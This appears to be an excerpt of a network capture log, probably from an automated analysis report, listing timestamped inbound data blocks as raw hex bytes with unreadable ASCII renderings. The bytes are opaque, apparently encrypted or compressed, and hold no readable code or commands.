                                                                                                                      2022-07-08 04:01:38 UTC137INData Raw: 08 58 86 1a b8 2e d0 0e 18 95 63 92 d4 58 b5 e9 e8 fc 4f e4 b8 89 41 6a 25 d0 fb 91 5a 30 5c b6 83 4c f3 e2 66 f8 f7 d5 0b ea 74 79 59 3e 1c c1 4e e7 57 85 92 52 a8 e7 ca 23 bf 0b 0a 5c 05 f0 5e b7 8d ba 38 59 ff 53 f6 38 57 8c 4f 6d c8 2b ce f5 bb c1 90 3e bf d0 42 52 76 b6 94 dc 1a f1 76 0b 14 54 bb 10 07 4a 65 9d d5 41 7c 58 2f f1 71 03 3f c0 b0 54 81 4a b1 37 06 25 cc 8d da de 36 58 19 22 61 01 de ae ce 75 7b d7 e8 8f e5 db 65 65 8a ac 88 28 61 90 b3 97 5a c3 53 69 21 50 9c 25 f7 9d 9e 4f 26 dc 36 88 ab 99 ff f8 9a d7 89 69 80 4f 50 b6 1f 02 bf ee bb 23 3f 68 61 6b 45 5a 10 a9 49 2a a8 2f 81 c6 2d 97 88 df df de 1e cc cb 90 d5 cc 09 bb 1b 97 d7 b3 1b 23 ad 4a 09 c1 a7 0b 14 7a bd 39 22 1a cd 3f ee 87 a6 93 8f 2b 36 ab a0 6a 58 ba 78 71 a9 bf 9f bc d4
                                                                                                                      Data Ascii: X.cXOAj%Z0\LftyY>NWR#\^8YS8WOm+>BRvvTJeA|X/q?TJ7%6X"au{ee(aZSi!P%O&6iOP#?hakEZI*/-#Jz9"?+6jXxq
                                                                                                                      2022-07-08 04:01:38 UTC139INData Raw: fa 24 dc f0 14 31 38 78 e5 f9 5b 22 56 52 38 b0 6a bb ee 12 da d1 34 b3 60 b0 b3 77 9d 2f a3 48 b6 d6 85 76 74 50 31 86 42 55 87 b5 7d 62 24 06 53 4b 4c 1e 1c 0d a5 89 dd c8 37 97 3a c3 eb 48 ae 4a e9 68 a0 4c cb eb 66 62 1e 9d 76 98 17 62 f3 4b a2 fc 82 9c 16 17 4a 5f 6d 8b 82 78 e5 d0 88 f3 fb b8 03 77 92 53 2c bb b1 7d 9f 61 59 05 e8 54 49 9f 58 9e 2d 72 a2 e7 ec ce f6 43 3b 81 b2 95 48 46 d8 b6 06 a0 9d 84 1b ab f4 ec d0 0c b4 4f 55 a0 e5 0e af 72 a2 67 9e f9 2c aa 84 c5 87 db 50 3b 04 ca 37 8e 48 3a d2 5e 3d 6c 23 bc 07 7a 72 9b da e4 92 8d fe 9e a7 44 aa 3a 9a 17 5b 30 41 ea ca 01 bd f2 83 2d 1b 2b 4b 99 37 81 9a 1b 60 d0 5b 93 6a 2c 43 19 fc 36 b0 8e 35 f3 0c d6 61 65 cf 53 90 21 db 1d 0a 50 71 42 44 be c0 2e 54 26 60 e1 89 dd 66 65 38 53 51 13 ca
                                                                                                                      Data Ascii: $18x["VR8j4`w/HvtP1BU}b$SKL7:HJhLfbvbKJ_mxwS,}aYTIX-rC;HFOUrg,P;7H:^=l#zrD:[0A-+K7`[j,C65aeS!PqBD.T&`fe8SQ
                                                                                                                      2022-07-08 04:01:38 UTC140INData Raw: 74 3e d3 71 ce 3c c0 b0 ee 96 7c a3 11 38 01 37 8c da f8 ac c4 67 43 7f 2e f2 77 0d 74 7d fd f0 d4 a9 cb 43 41 68 a0 8a 28 41 30 8d ba 4b fb 5b 9d 22 50 9a 2f ae fd ff 4e 3e f0 ef 4a aa 9f d5 e0 c1 9b 9a 4f a4 ac 5f b4 1f 22 67 d0 96 32 06 53 47 90 44 5a 36 62 d1 54 c9 39 a9 3b 0c 53 8f f5 5d 3a 5a e0 d9 b2 d5 07 0a bb 1b 2d af 85 0a 05 92 61 23 38 a6 2b f0 4e 3b 47 5b 33 34 3a ce 44 8d 15 f1 d0 12 86 b6 6c 68 7d 79 71 33 ba 33 b5 f2 15 69 02 06 57 ff c2 2d 07 2c 6b dd 3c b3 2c 76 d6 9b 20 d1 29 aa 5d b7 5e e9 f8 a4 b7 9e d1 6b 5f c5 19 19 fc 72 03 c2 31 f2 b2 45 12 45 d2 b3 19 fc fc bd 9a b3 f9 21 41 d4 2d bd f8 86 98 e0 14 e5 1a 94 6c b4 ab 90 07 01 20 30 cf 86 0d 0e 77 25 fd e9 0b 0d 9a e9 49 8c 80 92 b9 0b 74 00 15 91 2d 92 af bd cd 06 67 52 ab 53 a5
                                                                                                                      Data Ascii: t>q<|87gC.wt}CAh(A0K["P/N>JO_"g2SGDZ6bT9;S]:Z-a#8+N;G[34:Dlh}yq33iW-,k<,v )]^k_r1EE!A-l 0w%It-gRS
                                                                                                                      2022-07-08 04:01:38 UTC141INData Raw: 85 1d 29 fa 76 49 44 5b 9e 2d c8 74 d6 fe e8 c9 6c 11 78 b3 b5 dd 4c 5a c8 78 b7 b5 79 3a 42 f3 c6 52 e8 f0 63 44 82 e5 d3 ac 72 a2 dd b4 c9 3d 8c ba d9 7c da 50 1d 87 68 49 ef 57 12 2f 7f d7 6b 09 3a e3 3e 5e 8a f8 e4 4d 8e fe 9e 1d 76 9a 28 bc 2b 46 cb 40 ea ec 9a 1f 8c e2 33 10 07 92 73 36 87 b0 07 3b 9c 4b b5 4e e7 74 1b fc 16 37 b6 18 e1 37 de ae 66 cf 55 9a 1f 85 7c 0b 4f 79 4a 51 be c0 28 e4 85 33 91 ae fd 8e 44 0f 51 71 37 4d cd cc 5c 49 36 b9 63 e0 71 10 fe e4 51 bc 32 72 b9 94 59 3f fd 04 b7 b9 55 24 34 0a cf 3b 23 c5 18 40 81 88 5b 31 0f 69 3a 3b 85 72 c0 7a 0d 3a d4 fe 72 26 ae e5 c1 fd 36 de e3 35 5a 8b 72 c0 9d 44 16 75 68 88 fd ca e0 c5 5d bd 9f 83 87 be ee 04 00 64 19 68 fe 44 99 8e 14 ac 2e 18 b8 83 66 96 6b e6 a3 10 f8 92 2a 9e 8c 12 e4
                                                                                                                      Data Ascii: )vID[-tlxLZxy:BRcDr=|PhIW/k:>^Mv(+F@3s6;KNt77fU|OyJQ(3DQq7M\I6cqQ2rY?U$4;#@[1i:;rz:r&65ZrDuh]dhD.fk*
                                                                                                                      2022-07-08 04:01:38 UTC142INData Raw: 95 a5 33 da b3 6e 27 12 20 75 73 51 3b 43 63 41 cf 3b ce d8 82 be 9d 97 33 dc b0 4c 78 5f 7f 55 a9 9f 01 aa fc cc 78 00 00 7d 59 58 52 06 2c 70 f6 4f 48 2d 76 4a 94 8b bd 6e 8b 06 b1 7e f8 da b7 93 04 f4 59 40 cb c0 09 fe 74 29 64 a0 8d b3 45 09 75 a6 48 18 fc 60 b2 31 df be 00 1d d2 0d af da a6 bc 7a 31 d7 03 9a b5 a7 a9 96 2d a3 a1 4f ce 86 16 0d 02 de fc e9 97 02 35 86 0e ad dd 94 99 18 56 2b 31 0b 08 a2 96 62 ec 15 63 78 2d 0d e6 0a 47 0e 01 94 a8 86 65 03 c6 4f 59 b5 d3 74 43 bf 68 92 df 11 92 cf 2a 7d 21 87 6f e9 bf 45 fd ec a1 2f d9 63 e6 ef 1a b8 7d 57 bb 14 7b 8c 83 ce 26 57 a3 2b c4 37 c1 55 9d ad 65 fb 66 3a fa a2 79 44 42 78 a4 fc b6 e1 4b 2e 12 2f 87 44 34 5d fb c9 8d 3e fe 80 3a b9 9c 2c 13 54 f7 bf 84 a8 00 49 60 77 dd b0 e8 0d b6 94 9b 25
                                                                                                                      Data Ascii: 3n' usQ;CcA;3Lx_Ux}YXR,pOH-vJn~Y@t)dEuH`1z1-O5V+1bcx-GeOYtCh*}!oE/c}W{&W+7Uef:yDBxK./D4]>:,TI`w%
                                                                                                                      2022-07-08 04:01:38 UTC144INData Raw: 7c 14 ad 93 15 72 37 fe 98 7b d5 7d 43 a2 a5 7a 21 d6 0b 03 a9 bf c4 0e 4f 01 4d f0 35 d8 a7 76 1e 73 f0 35 d7 e8 c1 d5 49 16 8e 7e f8 59 c9 37 c4 57 96 ab 01 f0 6c 58 3b db ac 33 c7 34 bf 11 23 fd 25 01 47 1a da a4 85 fa 31 2f 51 27 2f ad ab 14 5a 0b 10 49 8e 3b de af e1 e7 54 b2 a0 82 ae 7f a2 43 df bf c7 14 ef 4d 85 28 ca c0 fc 41 95 66 a2 64 98 c4 82 61 17 30 91 fb 64 1b a6 92 d2 d5 3c 95 95 60 8c ed e4 a3 8a fd 70 1e b8 ac 37 fe af e3 b9 b4 f3 09 8c cd 22 2d d5 5c 95 4c e8 e7 4f 7e 82 bc 7b b5 04 55 ff bb dc 6e da 91 83 48 cc 4d 4f 01 f6 4f 28 ed e0 21 18 80 1d c5 6e 41 4f 9e 92 c8 92 c7 f0 fc 9e 8d 0e 76 83 ae c8 90 8d be 07 81 d6 aa f7 a2 74 8b db 35 89 ea cf f1 9b 66 b5 25 bf 4a 78 74 4c 69 b5 5b 1e db f4 55 7a 72 bb 14 38 84 4c 64 d4 db 5f 5f bc
                                                                                                                      Data Ascii: |r7{}Cz!OM5vs5I~Y7WlX;34#%G1/Q'/ZI;TCM(Afda0d<`p7"-\LO~{UnHMOO(!nAOvt5f%JxtLi[Uzr8Ld__
                                                                                                                      2022-07-08 04:01:38 UTC145INData Raw: 05 21 df b4 ea ab 00 0b 7f 7b fe e9 0d 07 aa bf 28 8d 9f 86 b1 e1 77 00 13 21 8e c1 df 9a ed 11 45 fa a9 73 87 91 62 27 33 ec 8a 2e 67 99 e3 42 89 bb f3 2a 5e 9e 40 4b ec 35 94 e5 b3 2f 68 7f 6e ed 99 c6 7d 92 c0 b4 fc 4a d4 96 38 11 7f cd 9e 19 89 82 a3 91 3b 5e 8b f2 9b 13 c7 7f 0c fb fd fb 66 38 f0 8e 05 25 43 e2 85 f1 c4 c5 6b 84 8a 0a aa 76 fe 55 9b cb 92 1f f6 26 1f b9 9a 19 b3 02 6f bf 84 aa 0a 64 1c 16 dc 2a c9 00 c5 b0 bb 8e de f4 34 f4 34 51 e5 63 61 27 6c 8d 19 55 6d 91 6c 4c 60 cc 34 b7 5f 15 99 8e 9c b5 80 4f 25 8e c4 db 76 54 11 40 76 7c 87 2f 4f 67 cc 21 73 ab 67 9c 62 4c 40 95 d9 e8 87 bd c3 c2 71 6b a9 d9 b1 29 0c 4e cf cb a1 55 37 9d ec aa 12 8a d4 6b 43 d7 04 e2 57 fd 56 5b 4d 3b a8 81 e4 4a ab f4 6f e0 42 d8 90 57 0c 73 87 54 9f fb 63
                                                                                                                      Data Ascii: !{(w!Esb'3.gB*^@K5/hn}J8;^f8%CkvU&od*44Qca'lUmlL`4_O%vT@v|/Og!sgbL@qk)NU7kCWV[M;JoBWsTc
                                                                                                                      2022-07-08 04:01:38 UTC146INData Raw: 3d 6d c5 65 ac 3a ce 46 87 2e 8d b1 13 1c 97 61 6a 59 59 cc ab 9f 1e 87 98 1f 79 00 19 4b f7 df 32 07 2a 5e 54 6a 2b 2c 76 d4 91 18 ad 48 ab c7 96 53 e9 dc 84 09 06 f4 46 6d 8b 13 08 fe 68 2b 1b df ec b4 6f 8f 2b 9b 4b 18 f8 da 28 1e cd 98 ba 64 fd 1c 89 da 39 9a 7a 31 e8 64 98 4c a6 b2 b8 fe 20 df 28 e5 00 6c 4c 5e dc f8 c9 cd 25 18 97 b2 a8 ad 84 bf 38 b6 02 15 0b 28 ce 94 9b ed 0a 6b 7a 52 72 87 0d 6d 8c 5f ab ab 86 61 b9 22 60 4b 93 69 0f 6c ad 4e 92 2c 37 92 cf 15 2e 23 7e 6e f6 b4 47 86 93 c0 28 f3 e1 b8 d1 19 b8 79 ed 5c 3b 6a aa 39 b4 09 45 85 2b 58 11 c1 55 aa 09 b6 fa 66 23 de 0c fe 24 43 7e 8a 5a a8 82 4a 2e 8c 2a 69 54 12 7d 01 ee a0 2c f8 ff dd bb 9c 33 15 e6 24 be 84 b1 27 e7 e7 17 dc b6 c6 ab a9 f7 9a 25 d8 d4 f0 d6 39 78 7f 46 53 1d 62 54
                                                                                                                      Data Ascii: =me:F.ajYYyK2*^Tj+,vHSFmh+o+K(d9z1dL (lL^%8(kzRrm_a"`KilN,7.#~nG(y\;j9E+XUf#$C~ZJ.*iT},3$'%9xFSbT
                                                                                                                      Data Ascii: w"TQY6[|D0!]=di8?;r~0F[MA;7}>rjZK|PRO?DsR'b_\L8p>sB6!].zP`zg{FsINA{{Q gbcL^ZZ thD)D}*R(.Q3!P?.g?b}~x.mv
                                                                                                                      2022-07-08 04:01:38 UTC187INData Raw: 5d 3e 2c e8 b5 56 86 43 b2 3e 96 43 2a ef 13 00 16 1c b2 7e 6e 88 6c b4 a6 a2 65 15 93 e0 fe 73 33 3c a3 6b c4 86 d8 58 a3 1d 21 72 06 5e 09 35 ec 41 3a c1 ba 2d 5e c7 76 f3 64 86 c9 92 8f b5 c8 ca ca 84 d7 19 81 e7 34 3d 00 c8 bd 6d a1 83 9b 17 ef 56 3b 6c 92 8b 92 e4 89 8f 69 7a 09 4b 0f 97 eb 1b 16 b4 04 9a 95 6d fe d3 2e 68 bc 5e 31 2e 0e 50 ae c0 77 ea 3b 12 5a 9a bb 4f 7d 5e 05 4e 7b b4 ec 3a 45 d4 66 c5 f2 90 a9 43 29 c6 f6 aa bf ac ad b8 7d 2b ad bb fe 7e 7b 57 3a 0f 5b 49 8b 48 d5 f6 eb d4 19 22 45 b5 cf 5f 83 fd 46 6e c3 f5 97 86 8a 91 f0 9f 7f 72 a1 6a 5f cf c2 3c c3 fa 0e 30 fe 68 c6 3f b8 98 28 42 fa 6b c4 61 6e 45 b8 f7 22 a5 22 32 f4 30 79 b3 ad c8 52 9b b0 a5 88 0b 57 54 71 a8 4e c1 76 c3 4a 4c 04 af 19 a6 c0 35 a7 71 fc d0 62 f4 d2 6f 4e
                                                                                                                      Data Ascii: ]>,VC>C*~nles3<kX!r^5A:-^vd4=mV;lizKm.h^1.Pw;ZO}^N{:EfC)}+~{W:[IH"E_Fnrj_<0h?(BkanE""20yRWTqNvJL5qboN
                                                                                                                      2022-07-08 04:01:38 UTC188INData Raw: bd c0 f5 74 b3 53 9a 37 5d 0d 35 8e c9 d8 01 da 47 41 9b 01 9f 8e 4f 76 98 df 37 aa 0b c8 c0 45 0d ad 61 2a 02 ba ab 95 53 de 38 80 23 52 b9 0c f2 e3 ba 4e 0f db 55 5b a9 9b b6 61 fc ea 98 4d 63 8f d2 b6 5a 22 9e f0 38 23 65 73 c8 97 9f 5d 3f 8b 6c 52 4a 2e c4 c2 0e 5b 6a d7 9a 44 18 e9 5a b6 b0 08 6c b3 98 b8 cf a8 fa 2b 69 69 e5 31 85 07 a1 46 7e 47 43 30 46 2a 8b 42 c7 ad 24 a7 82 ad 32 72 d3 69 e7 5a 8c 9f 1c a8 f3 35 7c 0f 2d 57 da 29 1e 07 07 7b f9 14 77 22 47 d0 8c a9 9c 48 96 52 86 7e c5 f5 93 b7 39 fb 7f 4d de 36 33 fe 4f 0c df de d1 bd 7a 0d 35 f5 0b 18 9c f5 d4 1c af 97 69 41 fb 02 e4 fa ad 97 37 31 e3 07 fd 4c 8d a6 c1 07 0a d0 c6 cf 83 1d c7 5f d9 f3 1f 0d 3e 08 cb 29 a6 8f 16 98 33 79 01 15 79 25 bf be ff ed 15 65 52 ab df 87 03 47 0a 21 67
                                                                                                                      Data Ascii: tS7]5GAOv7Ea*S8#RNU[aMcZ"8#es]?lRJ.[jDZl+ii1F~GC0F*B$2riZ5|-W){w"GHR~9M63Oz5iA71L_>)3yy%eRG!g
                                                                                                                      2022-07-08 04:01:38 UTC189INData Raw: 5e 77 5b 9e f1 53 68 fb ed ce 34 5e 2a 78 b1 95 be 6d 61 c8 7c a1 91 81 80 42 dd ec 46 97 2a 62 69 86 71 e6 ef 71 8f 47 27 e5 6f a9 b7 ed c6 db 15 3e 03 48 f3 ee 0e 39 e6 7e 3d 6c 91 bd be 48 c3 8a 7f c4 37 9b e6 89 8c 44 f2 2d a1 1c 5d de 3a ea a6 2b 4e 8c 9a 2c 64 2f 38 73 d9 80 6c 80 c0 fe c6 b6 d5 c4 f4 1d 0e 11 93 98 63 f8 0a f2 04 69 bc 47 9f b0 92 68 2e 47 ce 75 5e a7 83 37 99 1a ac ea 40 e7 89 7f 9a 48 e0 2a 4c f5 48 53 d8 0b 4b 7c 2f 6c d5 2b 3f 4c 1d 0e d0 b2 8f 7f d8 d3 23 18 d5 1d 9e 1d cc c6 e1 08 1e 32 dc a7 30 49 db 04 54 38 3d 86 c5 15 87 26 3f cb f6 59 46 af 5d ec d2 b0 a0 83 af 5a dd 59 ff 9f 02 17 24 4d fd cf ee c0 ba 5e 70 9f d0 7d 9c ee 42 1e b9 31 02 f5 46 9f a4 93 81 4e 52 93 86 46 ac 68 b3 a2 30 f7 be 38 fe ad 7f e7 38 0e b9 b4 f5
                                                                                                                      Data Ascii: ^w[Sh4^*xma|BF*biqqG'o>H9~=lH7D-]:+N,d/8slciGh.Gu^7@H*LHSK|/l+?L#20IT8=&?YF]ZY$M^p}B1FNRFh088
                                                                                                                      2022-07-08 04:01:38 UTC190INData Raw: 01 52 57 c0 7f 3c 07 52 29 70 29 cd 4e bd 27 d5 a0 bd b1 41 e3 d3 28 2d 36 17 05 9a ad 1e f3 bb 60 30 6e 72 64 ed 26 61 62 4d 10 9f 7a 3e 1e 44 d0 e5 c9 e6 26 df 6e 81 7e 9f 9f d0 e8 51 c6 46 3e 86 4d 57 ab 40 03 a9 bb 95 e4 24 61 20 9f 1a 79 95 88 f7 2e cd dc 49 22 a4 64 c0 94 e7 ea 03 51 fa 08 d3 2c 95 a9 c4 68 74 96 40 bb b0 26 2d 0d b9 9d 8d 44 49 6c a1 1c 8d d4 f9 d0 76 02 36 21 0b 45 fb 8b 9b bf 70 04 36 fe 3a e9 7f 76 3c 21 9e c5 d3 2c f7 97 53 7d 93 a1 4f 20 db 21 dc 99 04 a4 cf 61 3e 40 10 1a d8 8f 6f 37 df 81 6d 8a 2f 87 82 2d 8e 7d fb a7 0e 53 ef e5 d3 14 7a 94 4e ab 55 ec 61 b9 b1 d9 d7 5f 79 e6 1d 2a 12 7b 40 94 98 90 db 0e 1b bc 3d 9d 56 75 18 ef 94 d8 6a 98 e7 1e 85 d1 5c 51 09 62 db ba ae 68 8e 1e 55 9d b0 a8 6c d7 d3 da 25 9a b5 34 93 78
                                                                                                                      Data Ascii: RW<R)p)N'A(-6`0nrd&abMz>D&n~QF>MW@$a y.I"dQ,ht@&-DIlv6!Ep6:v<!,S}O !a>@o7m/-}SzNUa_y*{@=Vuj\QbhUl%4x
                                                                                                                      2022-07-08 04:01:38 UTC192INData Raw: 9c 67 9b de 0d a3 30 ff db f2 7c 5a 24 12 20 ec ea ac 65 ad 56 39 a4 da ae df 30 7c 0a 1d 54 ae bf e1 0c 37 16 cd 39 e0 35 68 36 81 09 bc 6b 27 91 2a 00 3f 9a 76 31 a5 6c 25 57 56 ef 67 79 c5 7d 82 a4 c3 11 17 48 09 38 79 dc 52 56 03 0d 7e 92 f0 1f 86 af a3 9e d7 f7 f9 82 55 03 8f 30 a0 9f 27 4f ef 29 fc ef 89 99 fc 39 e4 9f c4 3d 9e ac 5e 1f 35 6b 91 bb 1e 9f e1 c8 d2 09 43 b8 c0 1c ac 08 bc a3 e8 87 bf 5b e2 ac 4c bc 87 7f e2 b4 93 79 0a d4 19 2c a3 39 d9 bc 8f b8 10 e4 e5 f0 69 d0 45 d0 b9 da dc 0b 5c b7 c5 29 d3 1a 06 f8 bf 2e 2e a6 07 5f 1b e0 1d a2 2f c7 29 ff 92 37 d6 ea 84 bb be 6c 6d 76 e4 eb 4b e9 c9 df 6c f8 fe 20 93 d6 2d e5 3c 3f 89 eb 9f 87 d4 95 d2 46 cb b5 39 1d 3f 3b f4 dc 4c a9 9b 1f 10 36 cf 50 46 ff 05 9d 85 a9 36 05 5b a5 25 bb 7a a1
                                                                                                                      Data Ascii: g0|Z$ eV90|T795h6k'*?v1l%WVgy}H8yRV~U0'O)9=^5kC[Ly,9iE\).._/)7lmvKl -<?F9?;L6PF6[%z
                                                                                                                      2022-07-08 04:01:38 UTC193INData Raw: e5 7a 48 5f 99 92 8d 44 49 6e f8 43 e8 80 d4 fc 7f 1f 6e 5c 65 7e d0 d5 fe ed 52 00 26 ee 1d f1 62 35 65 4f a7 cf e8 11 cf 82 10 22 f2 91 46 24 bf 3b d7 99 70 fc b9 5c 23 66 10 03 8c d7 1b 29 f3 b2 47 b8 05 aa d5 18 f1 38 a3 eb 54 0f d8 c2 f3 48 32 a3 42 de 7a b2 25 e5 f6 fd 98 0a 59 d0 70 68 61 2c 0d c2 b0 b3 e3 2c 4b fc 55 e2 37 7c 19 f7 ae 8d 6c ab b1 6a d0 f1 56 73 15 6b d2 e0 e6 4b a1 7a 7a b9 b0 bf 4c b1 f3 d3 44 b2 90 58 b1 39 3f 80 17 33 60 20 01 74 30 23 da 80 56 6d a8 34 e1 0a d7 ef e7 f1 4a f1 1b 44 cd ac 16 1a 30 7d 05 43 07 e2 43 3d 2e 46 45 3b cc 23 7a 70 48 41 d6 af ad 4b cb a6 8a 8a 20 e0 a4 f2 09 e6 29 bb 9f f8 13 7b db 9e d2 57 3b b4 05 21 91 e7 9c 5e 9d 38 3b 01 f0 aa d3 81 b3 fa b8 13 a1 0e 13 92 13 63 24 de 11 f0 9a 18 6e 93 1e 0c 77
                                                                                                                      Data Ascii: zH_DInCn\e~R&b5eO"F$;p\#f)G8TH2Bz%Ypha,,KU7|ljVskKzzLDX9?3` t0#Vm4JD0}CC=.FE;#zpHAK ){W;!^8;c$nw
                                                                                                                      2022-07-08 04:01:38 UTC194INData Raw: 5e bd 21 c6 e3 ea b1 57 e7 c6 2d 28 0d 16 05 cc fc 6a ce bb 5b 2a 63 69 27 ba 26 54 62 58 2b 82 6d 3a 48 76 a3 d4 d2 f0 1c d2 2d d6 7e 8b 9f d0 e8 49 91 22 24 82 6d 71 8e 17 03 a1 b6 8d dc 22 68 01 83 3a 7d fc ac f6 70 b8 fd 74 38 a0 68 af a9 f2 ea 13 5f af 5c cb 3c c3 a9 c3 62 42 aa 5c a6 f2 6b 7d 2d b3 88 86 6e 48 74 c3 51 fd e5 96 de 7d 02 54 6c 7b 6d bf ed f4 8e 7e 00 26 ff 0a f7 6e 47 79 44 be f5 c5 0a f7 97 07 25 e7 a7 53 31 da 68 f4 84 59 f7 9c 5d 30 7b 1b 6e aa d6 02 0f f3 b2 4b d9 37 b2 c2 4c d7 2e b9 ec 4c 09 de d6 e3 41 57 c4 6e ee 4c 88 3b fc e4 ee 93 07 52 a4 67 72 49 37 0d d2 b9 d6 a0 2a 5e fc 7f d8 33 12 3c eb bb e1 57 bd be 6a d0 f3 5d 77 1d 7d db 84 e0 4b a2 7b 59 be da 89 4e a3 d5 f4 49 b0 91 57 a0 50 17 8b 21 1f 7c 21 74 50 21 1f cb b9
                                                                                                                      Data Ascii: ^!W-(j[*ci'&TbX+m:Hv-~I"$mq"h:}pt8h_\<bB\k}-nHtQ}Tl{m~&nGyD%S1hY]0{nK7L.LAWnL;RgrI7*^3<Wj]w}K{YNIWP!|!tP!
                                                                                                                      2022-07-08 04:01:38 UTC195INData Raw: 18 12 62 c9 d8 c0 4c a9 03 2e 97 af 99 ed 64 5f 36 05 68 9d 98 84 29 6f 70 e9 61 87 16 30 65 bd 22 c8 48 12 bf 39 30 4d 9e 4f 55 ae 5a 42 34 7d 8a 77 7e 95 79 be c0 cc 27 70 2f 1f 5d 4c c9 33 61 3f 4f 53 a5 94 33 b1 c8 e5 92 83 f6 98 c7 5a 39 e0 36 90 f1 23 16 a8 28 d1 aa 82 a3 93 3b d4 f1 c4 64 cd 97 77 6b 13 5c bf bb 36 fe d3 fb bc 28 37 f1 ea 27 cb 00 88 c4 8a 9b cd 57 d5 ee 49 95 e2 2c 8c e7 81 51 63 dd 24 2c 81 37 f7 a8 99 82 79 d0 f4 e5 1b fa 4a b7 fd fe af 2d 5c c7 e6 0c b2 29 06 ab 83 3d 47 a9 01 5f 2c ef 78 b2 2d a6 3d fb d6 33 c3 8b b1 ae cc 62 62 11 83 ca 50 c1 e3 d2 77 f8 9a 00 82 d0 1b cf 3a 4b af 8e bb a5 c9 88 c1 44 cb b5 0d 2b 31 29 fc b0 79 88 80 07 1c 3b dc 14 64 e4 09 ed b4 a9 3c 26 4a a5 38 ac 59 c0 e4 1b e0 25 c3 5e 76 6a 35 cb bf ac
                                                                                                                      Data Ascii: bL.d_6h)opa0e"H90MOUZB4}w~y'p/]L3a?OS3Z96#(;dwk\6(7'WI,Qc$,7yJ-\)=G_,x-=3bbPw:KD+1)y;d<&J8Y%^vj5
                                                                                                                      2022-07-08 04:01:38 UTC196INData Raw: fe f0 f9 f7 6b 13 53 61 79 6d de d3 9b a9 70 03 3e ca 07 e2 58 33 78 44 ab c7 86 02 fc 97 3d 0e fd 97 65 27 ec 1c c0 88 54 ff cf 76 23 70 0e 1a 86 ea 1b 0d f7 a1 43 d9 20 a3 c4 4a dd 0c b8 fb 4a 1e f9 d7 e3 41 36 ce 0b d7 76 ac 3a f8 fc cf 8e 14 59 b1 49 07 42 26 0c ff 90 86 82 39 4f e5 0a cd 33 66 22 cc 9b ec 4c bf b2 1e de f9 47 6a 2c 6f cc e5 c3 2a ad 73 16 bf dd ec 49 ba 96 fc 40 a8 ab 7d a0 5c 15 e5 10 1b 7b 1b 3d 6c 30 06 bb b8 53 74 a1 40 f4 1a cd d2 fa f9 42 a5 05 51 dc bb 31 1d 38 74 33 3a 26 f3 4a 35 4f 7a 50 16 df 2c 6a 75 43 26 c6 a4 bb 5e da ae c2 8d 23 84 af fa 09 f2 35 a2 a6 e4 17 6c f4 8f fc 56 14 ba 19 2c 89 ea f1 36 b4 37 2c 05 d4 c6 e6 8b a2 e7 ad 15 ab 62 3a c6 25 65 3e b0 2f fe 95 18 47 97 72 20 34 2b e7 5d 26 3e af 9e af 87 2c 75 17
                                                                                                                      Data Ascii: kSaymp>X3xD=e'Tv#pC JJA6v:YIB&9O3f"LGj,o*sI@}\{=l0St@BQ18t3:&J5OzP,juC&^#5lV,67,b:%e>/Gr 4+]&>,u
                                                                                                                      2022-07-08 04:01:38 UTC197INData Raw: cd f7 be 2b 50 d6 e1 29 ac 2f 8f cf ef 94 d1 5e d7 ac 6b 93 eb 6e cd c6 90 6a 64 d5 2c 2c 93 31 d9 ac bc 82 3d 97 ce fe 07 da 4a b6 92 bb 9b 2b 49 e1 e6 3a a0 34 08 96 be 21 48 a8 66 1c 16 ec 6d b4 3a a2 3f d7 fc 34 d8 ea 85 bf ca 54 5f 02 e2 fc 4b ff e3 d8 77 99 ae 21 99 c1 17 d2 2e 18 9c 8a bd 81 f2 8f d1 4a bf 97 38 2d 12 2e e6 a8 55 b5 84 00 01 1c d5 72 48 8b 20 f4 a7 be 3a 01 51 a5 28 8b 50 a6 df 74 d4 3e b1 6d 7d 7f 5a 8c 98 a8 1c 99 17 43 24 71 da cb 7c 74 3d a7 72 ed b8 ca 0b 35 48 ef e1 5c 2c cb d8 97 38 ad 7b f3 50 50 fe 7f 71 86 8f 4e 40 a8 16 2c da 99 b8 10 d0 8f eb 4f e2 fd 51 f5 6e 22 b9 84 bb 66 51 73 0f e3 44 1d 67 83 87 25 c9 4f f0 c2 6f 22 89 bc ae 44 5f 90 d9 d3 84 08 6e ca 1b d0 fb a8 59 51 b2 2d 53 38 e2 79 12 15 49 47 05 69 cd 7c bc
                                                                                                                      Data Ascii: +P)/^knjd,,1=J+I:4!Hfm:?4T_Kw!.J8-.UrH :Q(Pt>m}ZC$q|t=r5H\,8{PPqN@,OQn"fQsDg%Oo"D_nYQ-S8yIGi|
                                                                                                                      2022-07-08 04:01:38 UTC199INData Raw: f1 1d 67 09 60 ca ed c3 4f e1 5b 6e bf d5 9c 59 be f9 f5 76 b9 86 42 bd 5a 1d 96 63 2d 76 37 00 7d 38 45 e9 9b 5c 75 a4 59 d6 51 f0 f5 fa f9 5d ca 12 67 cd 96 01 1d 37 74 13 43 18 ee 4c 2a 20 46 4f 15 d9 63 48 75 5e 34 f4 b1 8a 4b cc aa a1 c5 0d eb a5 e7 60 cd 29 bd 98 e4 11 68 f4 8f d8 49 73 86 12 36 89 e7 f1 18 ae 23 31 19 fc c7 e4 ca 93 e1 b4 0d af 0e 13 e0 04 69 21 c6 14 fc 9e 0f 28 b7 1b 0a 05 36 ed 42 34 25 d5 ba a7 9a 2a 72 14 f1 f4 3d 05 39 e6 2a d8 ce e5 49 34 9c 8f b5 e5 91 25 21 f2 8c 89 dd 06 c3 29 f2 81 5f aa fd 88 0a 85 13 55 47 24 2d a1 26 5e b3 0d d7 20 42 c8 fe 37 3a f9 fc 83 1d f8 ba f7 f5 36 d4 4e f5 79 1a ac 33 ea ab 4e 4b d3 b2 5e 74 5f 0e 00 42 e8 ff f2 45 b8 32 c5 2b a9 26 5c 92 60 c4 e1 5a 9d 7c 9b f6 10 99 34 c8 ca c4 1e 67 35 06
                                                                                                                      Data Ascii: g`O[nYvBZc-v7}8E\uYQ]g7tCL* FOcHu^4K`)hIs6#1i!(6B4%*r=9*I4%!)_UG$-&^ B7:6Ny3NK^t_BE2+&\`Z|4g5
